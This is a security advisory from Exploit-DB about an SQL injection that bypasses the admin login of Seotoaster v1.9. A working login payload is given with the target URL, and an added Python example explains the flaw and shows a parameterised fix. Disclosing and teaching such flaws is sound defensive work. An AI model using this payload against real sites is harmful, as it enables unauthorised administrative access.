Seotoaster – SQL Injection

  • Author: Stefan Schurtz
    Date: 2011-12-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18246/
  • #################################################################################
    # Advisory:		Seotoaster SQL-Injection Admin Login Bypass
    # Author: 		Stefan Schurtz
    # Contact:		sschurtz@t-online.de
    # Affected Software:	Successfully tested on Seotoaster v.1.9
    # Vendor URL: 	http://www.seotoaster.com/
    # Vendor Status:	fixed
    #################################################################################
    
    ==========================
    Vulnerability Description
    ==========================
    
    Seotoaster v.1.9 is prone to an SQL injection that bypasses the admin login.
    
    ==================
    PoC-Exploit
    ==================
    
    http://<target>/seotoaster/go
    or
    http://<target>/go
    
    User: ' or 1=1)#
    PW: notimportant
    
    =========
    Solution
    =========
    
    Upgrade to the latest version
    
    ========
    Credits
    ========
    
    Vulnerability found and advisory written by Stefan Schurtz
    
    ===========
    References
    ===========
    
    http://secunia.com/advisories/46881/
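
The following is an added example, not part of the advisory and not Seotoaster's code. It shows why the `User` value from the PoC changes the meaning of a concatenated login query, and how a bound parameter plus an in-code password check rejects it. The query shape, the `users` table and all function names are assumptions; SQLite stands in for the database so the block runs offline.

```python
import hashlib, hmac, os, sqlite3

# Assumed query shape (not Seotoaster's actual code): the ")" in the advisory's
# payload suggests the login condition sits inside parentheses.
def concatenated_query(user, pw_hash):
    """The unsafe pattern: user input pasted straight into the SQL text."""
    return ("SELECT id FROM users WHERE (login = '" + user +
            "' AND password = '" + pw_hash + "')")

def as_mysql_reads_it(sql):
    """Simplified view: MySQL treats '#' as a comment running to end of line."""
    return sql.split("#", 1)[0].rstrip()

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed sample data: one admin account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
               "login TEXT UNIQUE, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users (login, salt, pw) VALUES (?, ?, ?)",
               ("admin", salt, hash_pw("correct horse", salt)))
    return db

def authenticate(db, user, password):
    """Hardened form: login is a bound parameter, password is checked in code."""
    row = db.execute("SELECT salt, pw FROM users WHERE login = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_pw(password, salt), stored)

if __name__ == "__main__":
    payload = "' or 1=1)#"  # User value from the advisory
    # The password test is commented out and the WHERE clause is always true.
    print(as_mysql_reads_it(concatenated_query(payload, "x")))
    db = make_db()
    # With a bound parameter the payload is only an unknown login name.
    print(authenticate(db, payload, "notimportant"))
    print(authenticate(db, "admin", "correct horse"))
```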